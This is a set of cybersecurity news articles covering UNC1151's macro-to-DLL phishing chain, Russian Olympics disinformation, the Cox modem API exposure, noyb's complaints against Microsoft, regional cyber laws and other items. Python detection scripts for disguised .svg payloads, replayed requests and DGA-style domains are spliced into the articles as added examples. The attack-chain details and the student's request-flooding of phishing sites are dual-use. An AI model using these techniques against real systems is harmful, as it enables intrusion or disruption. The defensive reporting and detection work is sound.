(Figure: interactive map of active clinics from the Consortium of Cybersecurity Clinics. Source: cybersecurityclinics.org)
  • University of Texas at San Antonio
  • UC Berkeley
  • Rochester Institute of Technology
  • Massachusetts Institute of Technology
  • Stillman College
  • Indiana University
  • University of Nevada, Las Vegas
  • The University of Alabama
  • University of Georgia
  • University of Texas at Austin

Clinics Attempt to Focus on Diversity and Inclusivity

In the announcement, Google also affirmed its commitment to fostering diversity and inclusivity within the cybersecurity industry. In recognition of these values, Google has extended its cybersecurity funding support to organizations such as the Computing Alliance of Hispanic-Serving Institutions (CAHSI), Stillman College, and the American Indian Science and Engineering Society (AISES). These organizations support colleges and universities that serve large populations of Black, Hispanic, Indigenous or tribal students. "Cyber attacks are a threat to everyone's security, so it's essential that cyber education is accessible," said a Google spokesperson. "With these newest 15 clinics, we're supporting institutions that serve a variety of students and communities: traditional colleges and universities as well as community and technical colleges in both rural and urban communities."

(Figure: cybersecurity clinic at Stillman College. Source: stillman.edu)

Google's investment in these clinics represents a strategic move to address the nation's workforce shortage, with at least 450,000 cybersecurity positions remaining open across the country. Google stated that its new cybersecurity clinics would help impart cybersecurity training to hundreds of students, while increasing its own commitment by $5 million, amounting to a total of about $25 million in support across clinics. The tech giant expects that these moves will help enable the operation of 25 cybersecurity clinics nationwide by 2025.

European Center for Digital Rights Claims Microsoft Violated Children's Privacy While Blaming Schools

By: Alan J
4 June 2024 at 17:55


noyb (None of Your Business), also known as the European Center for Digital Rights, has filed two complaints under Article 77 of the GDPR against Microsoft, claiming the tech giant violated the privacy rights of school children with its Microsoft 365 Education offering to educational institutions. noyb believes that Microsoft attempted to shift the responsibility and privacy expectations of the GDPR's principles onto the institutions through its contracts, but stated that these organizations had no reasonable means of complying with such requests as they did not maintain control over the collected data.

Shifting Privacy Expectations from Big Tech to Local Schools

The non-profit stated that as schools and educational institutions within the European Union increasingly relied on digital services during the pandemic, big tech companies capitalized on this trend to try to create a new generation of loyal customers. While welcoming the modernization of education, noyb believes that Microsoft has violated several data protection rights while providing educational institutions with access to Microsoft's 365 Education services, leaving students, parents and the institutes themselves with little choice.

noyb expressed concern over the market power of software vendors such as Microsoft, which enables them to dictate the terms and conditions of their contracts with schools. This power, the organization alleges, has allowed tech providers to shift the majority of legal responsibilities under the General Data Protection Regulation (GDPR) onto local authorities and educational institutions. noyb states that in reality, neither schools nor local authorities have the ability to influence how Microsoft processes user data. Instead, they often face a "take-it-or-leave-it" situation in which all decision-making power and profits lie with Microsoft, while the risks are expected to be borne by the schools. "This take-it-or-leave-it approach by software vendors such as Microsoft is shifting all GDPR responsibilities to schools," said Maartje de Graaf, a data protection lawyer at noyb. "Microsoft holds all the key information about data processing in its software, but is pointing the finger at schools when it comes to exercising rights. Schools have no way of complying with the transparency and information obligations."

noyb Believes Countless Children Affected by 'Secret Tracking'

noyb said that students and educational institutions faced a serious lack of transparency in the privacy documentation surrounding the usage of Microsoft's 365 Education services. Instead, students and institutes interested in the usage of data were forced to navigate a maze of privacy policies, documents, terms, and contracts, all of which were found to provide slightly different but consistently vague information about what happens to children's data. "Microsoft provides such vague information that even a qualified lawyer can't fully understand how the company processes personal data in Microsoft 365 Education," said de Graaf. "It is almost impossible for children or their parents to uncover the extent of Microsoft's data collection."

European Center for Digital Rights Files Two Complaints

The alleged violations of information privacy laws led noyb to represent two complainants against Microsoft. The first complaint cites the case of a father who, on behalf of his daughter, requested the personal data collected by Microsoft's 365 Education service under the GDPR's access provisions. Microsoft redirected him to the "data controller"; after confirming with Microsoft that the school was the data controller, he contacted the school, which replied that it only had access to the student's email address used for sign-up.

In the second complaint, an individual reported that despite not granting consent to cookies or tracking technologies, Microsoft 365 Education had installed cookies analyzing user behavior and collecting browser data, both of which are used for advertising purposes according to Microsoft's own documentation. This type of invasive profiling was being carried out without the school's knowledge or consent, the non-profit stated. "Our analysis of the data flows is very worrying," said Felix Mikolasch, a data protection lawyer at noyb. "Microsoft 365 Education appears to track users regardless of their age. This practice is likely to affect hundreds of thousands of pupils and students in the EU and EEA. Authorities should finally step up and effectively enforce the rights of minors."

noyb has requested that the Austrian data protection authority (DSB) investigate and analyze the data being collected and processed by Microsoft 365 Education, as neither Microsoft's own privacy documentation, the complainant's requests for access, nor the non-profit's own research could clarify this process, which it believes violates the transparency provisions mandated by the GDPR. noyb also believes that the authority should impose an additional fine on Microsoft, as it believes the company failed to comply with the right of access, and that all children living in the EU/EEA countries were affected by the uniformity of Microsoft 365 Education's terms and conditions and the privacy documentation of its services across the region.

Belarusian Government-Linked Threat Actor 'UNC1151' Targets Ukraine's Ministry of Defense

By: Alan J
4 June 2024 at 15:12


Cyble Research and Intelligence Labs (CRIL) researchers have observed a new sophisticated phishing campaign from the Belarusian government-linked threat actor "UNC1151" targeting the Ukraine Ministry of Defense to facilitate covert espionage operations. UNC1151 has previously been linked to large-scale, long-running influence campaigns that align with Russia's geopolitical interests and anti-NATO narratives.

UNC1151 Targets Ukraine Ministry of Defense With Phishing Lures

Researchers from Mandiant had earlier tracked the group's operations, active since at least 2017, as the "Ghostwriter Operation/UNC1151." The researchers concluded that the campaign was aimed at spreading pro-Russian narratives and disinformation to targeted audiences in Ukraine, Lithuania, Latvia and Poland. Recently, CRIL researchers discovered a new campaign from the Belarusian group targeting the Ukrainian and Polish governments, with a primary focus on the Ukrainian Ministry of Defense and the Ukrainian military, using socially engineered malicious Excel worksheet (XLS) files since at least April 2024.

(Figure: 2024 phishing lure targeting Ukraine's Ministry of Defense. Source: Cyble Blog)

These files, purporting to be official documents, are distributed to victims through spam emails. Once the spreadsheet is opened, an "Enable Content" button prompts victims to inadvertently start an embedded VBA (Visual Basic for Applications) macro.

(Figure: the Excel macro used in the UNC1151 phishing campaign. Source: Cyble Blog)

The malicious macro drops a shortcut (LNK) file and a malicious DLL (dynamic-link library) file on the victim's system. Executing the LNK shortcut launches the DLL through the operating system's built-in Rundll32.exe (commonly abused to load malicious DLLs), and the DLL carries the infection forward using seemingly innocuous ".svg" image files that actually hold hidden, encrypted content. Upon decrypting these .svg files, the researchers observed a hidden DLL, concluding that it likely leads to the final payload and citing a Talos Intelligence study of the group's campaign last year in which researchers observed ".jpg" image files being used to deliver payloads.

However, CRIL researchers were unable to retrieve the final encrypted payloads from these .svg files, suggesting improved obfuscation practices. They suspect that the final payload potentially includes the same malware, such as njRAT, AgentTesla, and Cobalt Strike, that was present in the encrypted .jpg image files observed in the previous campaign. The researchers believe the payload aims at exfiltrating information from infected systems in addition to establishing unauthorized remote control over them.
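The section above describes encrypted DLLs carried in files with an .svg extension. A genuine SVG is an XML document with an `svg` root element, so a file that carries the extension but does not parse as such, or whose bytes look like ciphertext, is a cheap thing to flag at a mail gateway or in a triage script. The following added example (not Cyble's code and not part of this article) does exactly that: it checks whether the content parses as SVG and, if not, measures its byte entropy to separate "not an image at all" from "probably encrypted or compressed". The sample inputs are constructed: a tiny real SVG, a deterministic random byte blob standing in for an encrypted payload, and a plain-text file misnamed as .svg.

```python
"""Flag '.svg' files whose content is not an SVG document.

Added example. Sample inputs are constructed; the random blob only stands
in for encrypted content and is not derived from any real sample.
"""
import math
import random
import xml.etree.ElementTree as ET

SVG_NS_TAG = "{http://www.w3.org/2000/svg}svg"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 for empty input, up to 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def looks_like_svg(data: bytes) -> bool:
    """True only if the whole file is well-formed XML with an <svg> root.
    Trailing bytes after the root element make the parse fail, so an SVG
    with a blob appended is also rejected."""
    try:
        root = ET.fromstring(data)
    except (ET.ParseError, ValueError):
        return False
    return root.tag in ("svg", SVG_NS_TAG)


def classify_svg(data: bytes, entropy_threshold: float = 7.0) -> str:
    """'svg' for a parseable SVG; otherwise 'suspicious_high_entropy' when
    the bytes look encrypted or compressed, else 'suspicious'."""
    if looks_like_svg(data):
        return "svg"
    if shannon_entropy(data) >= entropy_threshold:
        return "suspicious_high_entropy"
    return "suspicious"


# Constructed samples.
GENUINE_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
               b'<rect width="10" height="10"/></svg>')
# Deterministic pseudo-random bytes: entropy close to 8 bits/byte, as
# encrypted content would be. Not a real payload.
FAKE_SVG_BLOB = random.Random(7).randbytes(4096)
# Plain text saved under an .svg name: not XML, but low entropy.
TEXT_AS_SVG = b"hello world\n" * 200


if __name__ == "__main__":
    for name, blob in (("genuine.svg", GENUINE_SVG),
                       ("blob.svg", FAKE_SVG_BLOB),
                       ("text.svg", TEXT_AS_SVG)):
        print(f"{name}: {classify_svg(blob)} (entropy {shannon_entropy(blob):.2f})")
```

The entropy threshold of 7.0 is a starting point rather than a rule: compressed images embedded in legitimate files also score high, which is why the check is applied only after the XML parse has already failed. A real SVG with an appended payload fails the parse too, since expat rejects data after the document element, so the test does not need a separate rule for that case.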

Previous UNC1151 Campaign and Advancements

Inspection of the lure documents in the recent phishing campaign led the researchers to suspect that it primarily targeted the Ukraine Ministry of Defense. The researchers highlighted the similarities and differences between the recent campaign and an earlier campaign last year targeting the Ukrainian and Polish governments, along with their military and civilians. The 2023 campaign similarly operated through Excel and PowerPoint files that tricked users into running hidden macro code, which loaded malicious .LNK shortcut files and DLL files onto the infected system.

(Figure: differences between the UNC1151 Ministry of Defence phishing campaigns. Source: Cyble Blog)

However, the newer campaign employed different phishing lures, such as images of drones, and the document purports to be from the Ukrainian Ministry of Defense. While the encrypted .jpg image files in the previous campaign directly concealed an .EXE file, the new campaign's .svg image files instead concealed an additional malicious DLL file. This DLL file is written to the system's temporary directory (%Temp%) and run through the legitimate Rundll32.exe present on the Windows operating system. The researchers cite these variances as an example of the group's evolving tactics, with a sustained effort to compromise Ukrainian targets for strategic gain. The researchers recommend the use of email filtering systems, verification of the identity of email senders, limiting the execution of scripting languages, setting up network-level monitoring, and regular backup of important data.

'Olympics Has Fallen': Russian Government Attempts to Discredit 2024 Paris Olympics

By: Alan J
4 June 2024 at 08:57


Researchers from Microsoft have observed a year-long coordinated campaign by Russian threat actors to influence the public's view of the upcoming 2024 Paris Olympics. The chief effort of these influence operations has involved an AI-generated Tom Cruise movie titled "Olympics Has Fallen," parodying the title of the Hollywood movie "Olympus Has Fallen." In the Russian AI movie, a voice and image impersonation of Tom Cruise appears to discredit the leadership of the International Olympic Committee. Along with the movie, the influence operations have also disparaged the French nation, French President Emmanuel Macron, and the hosting of the upcoming games in Paris.

Use of AI in Influence Campaigns

These operations were linked to the Russian-affiliated threat actors Storm-1679 and Storm-1099. In an effort to sow disinformation and denigrate the International Olympic Committee (IOC), these groups distributed fake videos and spoofed news reports employing AI-generated content, even stoking fears of violence in Paris. Storm-1679 was behind the distribution of the feature-length fake documentary "Olympics Has Fallen" last summer. This movie was produced using an AI voice impersonating the American actor Tom Cruise and demonstrated slick, Hollywood-style production values. The movie also featured an official website, while purporting to be from Netflix. The researchers observed the use of evolved tactics throughout the campaign, blending traditional forgeries with cutting-edge AI capabilities. Distribution of the film included additional AI-generated fake celebrity endorsements that were edited into legitimate videos from Cameo, a service where fans can pay celebrities to read personalized messages or for custom content. These deceptive ads made it appear that the celebrities promoted the anti-Olympic rhetoric in the film.

Stoking Fears of Violence at 2024 Paris Olympics

Alongside the anti-Olympics rhetoric carried by AI-generated deepfakes, the campaign also tries to sow discord and stoke public fear of violence or terrorist incidents during the games. This fearmongering may be intended to depress attendance and viewership. The operations include:
  • Spoofed videos branded as legitimate news outlets such as Euronews and France24, claiming that a high percentage of the event's tickets were returned over security concerns.
  • Fabricated warnings attributed to the CIA and French intelligence services about terror threats targeting the event.
  • Fake graffiti images suggesting a repeat of the 1972 Munich Olympics massacre that targeted Israeli athletes. Researchers observed a video featuring imagery from that incident, amplified further by pro-Russian bot accounts.
The researchers warn that these influence efforts could intensify as the July 26 opening ceremony draws near, and predict that the campaign may shift to more automated tactics such as bot networks to amplify messaging across social media platforms. The report noted that these threat actors had previously targeted the Ukrainian refugee community in the U.S. and Europe with similarly spoofed news content designed to spread fear and disinformation.

Previous Russian Influence Attempts on the Olympic Games

While psychological tactics dominate the campaign, the researchers note that it marks the addition of advanced technology to the long history of Russian disinformation operations. They cited examples such as the Soviet Union attempting to stoke fears before the 1984 Summer Olympics in Los Angeles by distributing pamphlets in Zimbabwe, Sri Lanka and South Korea claiming that non-white competitors would be targeted with violence. In 2016, Russian threat actors hacked the World Anti-Doping Agency and leaked confidential medical records of American athletes Serena Williams, Venus Williams and Simone Biles. In 2018, the "Olympic Destroyer" malware attack on the Winter Olympics in South Korea disrupted IT systems during the opening ceremony and took some services offline, and in 2020 the U.S. Department of Justice charged six Russian GRU officers over that attack. Together with the current influence campaign, these incidents show a sustained effort by the Russian government to undercut and discredit international competitions in the eyes of prospective attendees and global spectators, rooted in its long-running tensions with the organisations that oversee them.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

Utah Student Gives Hackers False Information to Thwart Phishing

By: Alan J
3 June 2024 at 17:00


A group of Utah high school students has set out to counter phishing by using their computer skills to take fraudulent websites offline, protecting potential victims. Charles Mortensen, a junior from Davis County, developed VEGA, a system that aims to protect phishing victims and outsmart the attackers by feeding their pages false information until they are useless.

Utah Student Motivated By Personal Connection to Hacking Victims

"All my friends and peers around me got hacked," Mortensen told a local reporter. Mortensen, a student at Davis County High School, said he had watched a rising tide of hacking incidents in his community. He cited a friend in foster care who fell victim to an Instagram phishing attempt, jeopardising her only means of staying in contact with her mother. Moved by these incidents among his peers, Mortensen built VEGA (Victims' Empowerment Guard against Attacks). Phishing sites expect victims to enter genuine credentials; VEGA subverts them by submitting fake details such as made-up usernames and passwords.

(Image: the Davis County high school students behind VEGA. Source: kslnewsradio.com, credit Charles Mortensen)

Mortensen says he has seen success in flooding attackers with streams of false information. He was quoted by KSL News Radio as saying, β€œI can send about half a million requests to one hacker within a night. I just let VEGA run overnight and then normally when I wake up … the website [is] shut down.”

Student Sought Help From Peers With Anti-Phishing System

While Mortensen currently runs the program only on his own machine, he hopes to get VEGA running on 'a whole bunch of computers.' He says VEGA can take down thirty phishing sites in a month, and that access to more systems would let it take down thousands in the same period; he is seeking a sponsor to fund that capacity. Mortensen, a junior at the Davis Catalyst Center, brought in his friends Regan Hosea and Jordan Kingston to improve the system after building the first release of VEGA. If the takedown claims hold up, VEGA could be an early example of a novel approach to countering phishing, which remains a significant security challenge for organisations of all sizes, while offering some hope to the phishing victims among his peers and encouraging further collaboration on similar defences.

Researcher Uncovers Exploited Flaw in Cox Modems That May Have Impacted Millions of Customers

By: Alan J
3 June 2024 at 12:32


Cybersecurity researcher Sam Curry discovered that his home network had been compromised while experimenting with his HTTP traffic setup. The intrusion was not limited to one device: it affected both his PC and his iPhone. On further investigation, Curry concluded that it likely stemmed from a wider compromise of Cox modems rather than an attack aimed at him alone, one that could affect millions of customers and entire networks, with the attacker's infrastructure linked to a history of phishing campaigns and router attacks.

Unfamiliar IP Address Replaying Cox Modems HTTP Requests

Curry found that an unfamiliar IP address (159.65.76.209) had been intercepting and replaying web requests on his home network while he was testing his HTTP traffic setup. The behaviour was not tied to a single device: it affected his iPhone as well as his computer.

(Image: VirusTotal scan of the suspected IP 159.65.76.209. Source: samcurry.net)

This led him to believe the incident was more than a localised attack. When he tried to isolate it by switching between cloud providers such as AWS (Amazon Web Services) and GCP (Google Cloud Platform), the suspicious activity persisted, which pointed at the modem itself. Curry traced the IP address to DigitalOcean and, three years later, shared his findings on vacation with friends who worked at various threat intelligence companies; together they set out to find out how big the problem was.

The group linked the IP address to a history of malicious use, including hosting content for targeted phishing campaigns against ISG Latam (a South American cybersecurity company) and Adidas. The address had hosted over 1,000 domains, all following the same pattern: a name followed by six digits and a top-level domain. That pattern suggests the malware operators used a domain generation algorithm to rotate C&C server addresses for additional obfuscation.

(Image: domains observed on the suspect IP. Source: samcurry.net)

The researcher said the attacker's intent was hard to read, since the same IP address had been used against ISG Latam, Adidas and his own modem.
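The observation that opened the investigation, a second IP repeating requests the researcher's own devices had just made, is something a defender can check for in their own server logs. The following is an added example and not part of Sam Curry's write-up: it scans constructed Common Log Format lines from a server the defender controls and flags any client that repeats a request first issued from the home IP within a short window. The log lines, the IP addresses and the 300-second window are constructed assumptions, not data from the incident.

```python
"""Spot requests replayed from an unexpected client IP.

Added example, not part of Sam Curry's write-up. Reads constructed
Common Log Format lines from a server the defender controls: if a request
(method + path) first seen from the home IP is repeated by a different IP
shortly afterwards, that second IP is a replay suspect. Log lines, IPs and
the window are constructed/assumed.
"""
import re
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: the home IP hits two unique probe URLs, then another
# IP repeats both eight seconds later, and one of them again much later.
SAMPLE_LOG = """\
198.51.100.23 - - [01/Jun/2024:10:00:01 +0000] "GET /probe/7f3a9c?x=1 HTTP/1.1" 200 12
198.51.100.23 - - [01/Jun/2024:10:00:02 +0000] "GET /probe/b81e2d HTTP/1.1" 200 12
203.0.113.77 - - [01/Jun/2024:10:00:09 +0000] "GET /probe/7f3a9c?x=1 HTTP/1.1" 200 12
203.0.113.77 - - [01/Jun/2024:10:00:10 +0000] "GET /probe/b81e2d HTTP/1.1" 200 12
198.51.100.23 - - [01/Jun/2024:10:05:00 +0000] "GET /favicon.ico HTTP/1.1" 404 0
203.0.113.77 - - [01/Jun/2024:11:30:00 +0000] "GET /probe/7f3a9c?x=1 HTTP/1.1" 200 12
"""


def parse(line):
    """Return (ip, timestamp, method, path) or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return (m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"], m["path"])


def find_replays(log_text, home_ip, window_s=300):
    """Return (replayer_ip, request, delay_seconds) for each request first sent
    by home_ip and repeated by another IP within window_s seconds."""
    first_seen = {}
    replays = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, path = rec
        key = (method, path)
        if ip == home_ip:
            first_seen.setdefault(key, ts)   # keep the earliest sighting
            continue
        if key in first_seen:
            delay = (ts - first_seen[key]).total_seconds()
            if 0 <= delay <= window_s:
                replays.append((ip, f"{method} {path}", delay))
    return replays


def replay_sources(log_text, home_ip, window_s=300, min_hits=2):
    """IPs that replayed at least min_hits distinct requests: one coincidence
    is noise, several unique URLs echoed back is not."""
    counts = {}
    for ip, req, _ in find_replays(log_text, home_ip, window_s):
        counts.setdefault(ip, set()).add(req)
    return sorted(ip for ip, reqs in counts.items() if len(reqs) >= min_hits)


if __name__ == "__main__":
    for ip, req, delay in find_replays(SAMPLE_LOG, "198.51.100.23"):
        print(f"{ip} replayed {req} after {delay:.0f}s")
    print("replay sources:", replay_sources(SAMPLE_LOG, "198.51.100.23"))
```

Requesting unique, unguessable paths (as the probe URLs above) is what makes this work: a path nobody else could know about, showing up from a second address seconds later, can only have been observed in transit.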

Hidden API Calls and Extent of Compromise

Digging further, Curry looked for publicly known vulnerabilities in his Cox modem model but found that, even three years on, there were no known exploits. He confirmed the ISP's remote management capability while helping a friend set up a Cox modem: he called Cox support and asked whether they could push an update to the device at its new location, and the agent explained that remote management covered updating device settings, changing Wi-Fi passwords and viewing connected devices. Curry theorised that the backdoor lay in this remote management path, focusing on the TR-069 protocol that lets ISPs administer customer devices remotely, and strongly suspected that this feature, or the tools the ISP's support teams used, were being abused.

Examining the Cox Business portal's API, he uncovered numerous unprotected endpoints that could give attackers extensive unauthorised access, and believed the vulnerable API reached both Cox residential and business services.

(Image: hidden API calls exposed from the Cox modem configuration page. Source: samcurry.net)

Curry was able to use the router configuration page to load hidden API documentation, exposing a weakness that could theoretically have handed attackers control over the modems of millions of Cox customers. He reported the findings through Cox's responsible disclosure page; Cox took down the vulnerable API calls within six hours, and the following day the researcher confirmed he could no longer reproduce any of the issues.

Cox said it had not observed the reported API vector being exploited, and confirmed that the DigitalOcean IP address had no affiliation with the company. Curry noted that this means his device was compromised by some route other than the one described in his blog and reported to the ISP. The compromise of his device, together with the vulnerabilities he found in the modem's hidden API, illustrates the inherent risks of remotely managed systems.
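The domain pattern noted earlier in this article, a name followed by six digits and a TLD, is the kind of signal a threat intelligence team turns into a detection. Below is an added example, not code from the write-up or from the Cox investigation, that matches that shape and then groups hits by serving IP, since a single odd domain is weak evidence while a cluster on one host is not. The records, IPs and the minimum-count threshold are constructed assumptions.

```python
"""Cluster DGA-style domains by the IP that serves them.

Added example, not from Sam Curry's write-up or the Cox investigation.
The only pattern used is the one described in the article (a name, six
digits, then a TLD); the records, IPs and the threshold are constructed.
"""
import re
from collections import defaultdict

# Name followed by exactly six digits and a TLD, e.g. "update857213.com".
DGA_PATTERN = re.compile(r"^[a-z]+[0-9]{6}\.[a-z]{2,}$")

# Constructed passive-DNS style records: (domain, resolving IP). Not real.
RECORDS = [
    ("update857213.com", "203.0.113.10"),
    ("secure113904.net", "203.0.113.10"),
    ("login904117.com", "203.0.113.10"),
    ("portal552301.org", "203.0.113.10"),
    ("www.example.com", "198.51.100.7"),
    ("mail.example.com", "198.51.100.7"),
    ("cdn442.example.net", "198.51.100.9"),   # three digits and a subdomain: no match
    ("ABC123456.com", "203.0.113.11"),        # matches once normalised to lower case
]


def is_dga_like(domain: str) -> bool:
    """True if the domain fits the name + six digits + TLD shape."""
    return DGA_PATTERN.match(domain.strip().lower()) is not None


def suspicious_hosts(records, min_domains: int = 3) -> dict:
    """Map IP -> sorted DGA-like domains, keeping only IPs that serve at
    least min_domains of them."""
    by_ip = defaultdict(list)
    for domain, ip in records:
        if is_dga_like(domain):
            by_ip[ip].append(domain.strip().lower())
    return {ip: sorted(doms) for ip, doms in by_ip.items() if len(doms) >= min_domains}


if __name__ == "__main__":
    for ip, doms in suspicious_hosts(RECORDS).items():
        print(f"{ip}: {len(doms)} DGA-like domains -> {doms}")
```

In practice the regex would be one feature among several (registration age, TLS certificate reuse, hosting provider), but the grouping step is the same: pivot from the domain shape to the infrastructure behind it.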

A Comparative Look at Cybersecurity Regulations Across the META Region

By: Alan J
2 June 2024 at 13:45


The META region (Middle East, Turkey and Africa) is experiencing a digital surge, with connectivity weaving its way into businesses, governments and individual lives. This growing digital landscape has a dark side: a rising tide of cyber threats, from simple phishing to sophisticated ransomware and espionage campaigns. Recognising this, governments across the region are actively building their cyber defences and enacting a complex tapestry of cybersecurity laws and regulations. For Middle East governments and businesses, robust cybersecurity regulation is not merely a legal obligation; it is a strategic imperative to safeguard data, privacy and the stability of operations. Understanding this web of laws is essential for businesses and individuals navigating the digital landscape while avoiding unforeseen risks.

Recommendations in Building a Strong Cyber Ecosystem and Drafting Adequate Laws

To combat cyber threats effectively, a strategic approach to law-making and regulation is paramount. It should pay special attention to the needs of everyone involved in the ecosystem and foster collaboration through integrated planning and implementation. Key elements include:
  • Establish a Central National Cybersecurity Body and Strategy: An independent body should define and supervise the national cybersecurity agenda, with the credibility and authority to act across public and private organisations.
  • Identify and Address Stakeholder Needs: Map out the key private and public entities, including government agencies, businesses and cybersecurity firms, and define their roles in the national cybersecurity programme.
  • Establish Dialogue: Governments and businesses should foster dialogue across stakeholders to encourage collaboration. This could take the form of a governance body that assesses each stakeholder's specific needs, such as access to threat intelligence, training or technical expertise, and folds them into a holistic cybersecurity programme.
  • Co-ordinate Efforts and Planning: Governments and authorities must build a collaborative approach that ensures participation from all stakeholders while avoiding siloed efforts.
  • Adopt National Information Security Policies: Develop, implement and update national cybersecurity policies and strategies, with adequate funding and political support, that are publicly consulted on and reviewed regularly.
  • Develop Personal Data Protection Legislation: Create and implement comprehensive legislation to protect personal data, combat cybercrime and maintain digital security.
  • Protect Critical Information Infrastructure: Identify critical infrastructure sectors and prioritise their protection. Governments should secure power supply networks, diversify providers and encourage local enterprises to safeguard critical information.
  • Create National Cyber Incident Response Teams: National CIRTs should monitor threats and help organisations recover. Countries with existing CIRTs should establish sectoral teams and collaborate regionally.
  • Cooperate Internationally: Support regional and international efforts to combat cybercrime, share evidence and extradite cybercriminals. International collaboration keeps governments informed about cyber threats and strengthens cybersecurity norms.

Key Trends in Cybersecurity Regulations Across the Region

  • Data Protection: Data localisation, where companies are required to store data within national borders, is becoming increasingly common. Countries such as Saudi Arabia and the UAE have implemented strict data protection laws mirroring the European Union's General Data Protection Regulation (GDPR).
  • Critical Infrastructure Protection: Governments are prioritising the protection of critical infrastructure from cyberattacks. Countries such as Israel and Turkey have established dedicated cybersecurity agencies and implemented regulations for operators of critical infrastructure in sectors like energy, finance and healthcare.
  • Cybercrime Legislation: Laws addressing cybercrime, including hacking, phishing and online fraud, are being strengthened. Egypt, for instance, recently introduced a comprehensive cybercrime law with severe penalties for offenders.
  • Incident Reporting: Mandatory incident reporting requirements are becoming increasingly common. Companies are obliged to report cybersecurity incidents to the relevant authorities, allowing timely response and mitigation.

Country-Specific Examples of Cybersecurity Regulations:

Middle East

United Arab Emirates (UAE)
The UAE stands out for its proactive approach to cybersecurity regulation.
  • UAE Cybercrime Law (Federal Decree-Law No. 34 of 2021): Criminalises a range of cyber activities, from hacking and phishing to spreading misinformation online, and introduces harsh penalties for cybercrimes involving critical infrastructure.
  • National Cybersecurity Strategy (2019): Aims to create a safe and resilient cyber infrastructure in the UAE; key pillars include strengthening cybersecurity laws and fostering international collaboration.
  • Data Protection Law (Federal Decree-Law No. 45 of 2021): Aligns closely with GDPR principles, securing personal data protection and requiring organisations to implement robust data security measures.
Upcoming Developments in Dubai:
  • Critical Infrastructure Protection Framework: A framework to safeguard critical infrastructure against cyber threats.
Saudi Arabia
Saudi Arabia has adopted a rigorous stance on cybersecurity, reflecting its Vision 2030 ambitions.
  • National Cybersecurity Authority (NCA): Established in 2017 to oversee cybersecurity regulations and policies.
  • Essential Cybersecurity Controls (ECC): Comprehensive cybersecurity controls mandated by the NCA.
  • Personal Data Protection Law (2021): Grants citizens more control over their personal data and aligns with international standards.
  • Anti-Cyber Crime Law (2007): Covers offences such as hacking, phishing and electronic fraud.
  • New Regulatory Framework (2024): In a move indicative of its rapid development, the NCA introduced a new regulatory framework in 2024 to bolster the cybersecurity landscape.
  • Managed Security Operation Centre (MSOC) Policy: Regulates MSOC services and restricts organisations from providing them cross-border rather than within the national ecosystem.
Qatar
Qatar continues to fortify its cyber defences, drawing in particular on lessons learned from the cyberattacks it experienced during the 2022 FIFA World Cup.
  • Qatar Cybercrime Prevention Law (2014): Criminalises a range of cyber offences, including hacking, phishing and online fraud.
  • Qatar National Cybersecurity Strategy (2014): Lays out the framework for securing critical infrastructure and enhancing cybersecurity awareness.
  • Data Privacy Protection Law (2016): Focuses on personal data protection and mandates data localisation requirements.
Upcoming Developments in Qatar:
  • New Cybersecurity Strategy (2024-2030): Expected to incorporate lessons learned from hacks and intrusions during the FIFA World Cup.
Bahrain
Since 2018, Bahrain's Personal Data Protection Law has set guidelines for data quality control, incident response and consumer rights.
  • Key Differences from GDPR: The right to access personal data is not clearly articulated, and a limited enforcement history leaves the robustness of this right uncertain.
Turkey
Turkey has comprehensive cybersecurity regulations to address increasing cyber threats.
  • Law on Protection of Personal Data (No. 6698): Enacted in 2016, this law closely follows GDPR principles.
  • National Cybersecurity Strategy and Action Plan (2020-2023): Focuses on securing critical infrastructure, enhancing public awareness and fostering international cooperation.
Upcoming Developments in Turkey:
  • Increased commitment to cybersecurity: Turkey reportedly seeks to strengthen its cybersecurity commitments as part of the Development Plan for 2024–2028.

Africa

South Africa
South Africa leads the continent in cybersecurity regulation with its progressive legislation.
  • Cybercrimes Act (2020): Consolidates and criminalises various cyber offences, including hacking and cyber fraud.
Upcoming Developments in South Africa:
  • National Cybersecurity Policy Framework (NCPF): Revisions are under way to address emerging cyber threats.
Kenya
Kenya has taken significant steps to enhance its cybersecurity measures.
  • Computer Misuse and Cybercrimes Act (2018): Criminalises cyber offences such as hacking and online fraud.
  • National ICT Policy (2019): Includes a dedicated cybersecurity strategy focusing on infrastructure security.
Nigeria
Nigeria, Africa's largest economy, is increasingly prioritising cybersecurity.
  • Cybercrimes (Prohibition, Prevention, etc.) Act (2015): Criminalises cyber offences such as hacking and identity theft.

Conclusion

Harmonising regulations and raising awareness among public officials, businesses and citizens across the META region is crucial for effective cybersecurity collaboration. The region also presents a distinct opportunity for cybersecurity innovation: regional collaboration can foster knowledge sharing and strengthen cyber resilience as local startups develop tailored solutions. While each country adopts strategies suited to its socio-economic context, there is a clear trend towards alignment with global best practices such as the GDPR.

NIST Hires External Contractor to Help Tackle National Vulnerability Database Backlog

By: Alan J
31 May 2024 at 16:49


The U.S. National Institute of Standards and Technology (NIST) has taken a significant step to address the growing backlog of unprocessed Common Vulnerabilities and Exposures (CVE) entries in the National Vulnerability Database (NVD): it has hired an external contractor to provide additional processing capacity. The contractor has not been named, but NIST said it expects the move to return processing to normal rates within the next few months.

Clearing the National Vulnerability Database Backlog

NIST manages the entries in the NVD. Overwhelmed by the volume of submissions, with a backlog of CVEs accumulating since February, the institute has awarded a contract to an external party to assist with processing. "We are confident that this additional support will allow us to return to the processing rates we maintained prior to February 2024 within the next few months," the agency stated. To further reduce the backlog, NIST is also working closely with the Cybersecurity and Infrastructure Security Agency (CISA) to improve its overall operations and processes. "We anticipate that this backlog will be cleared by the end of the fiscal year," NIST stated.

In its status update, NIST referred to an earlier statement that it was exploring ways to handle the rising volume of vulnerabilities through modernised technology and process improvements.

(Image: NIST NVD status update. Source: NIST NVD Status Updates)

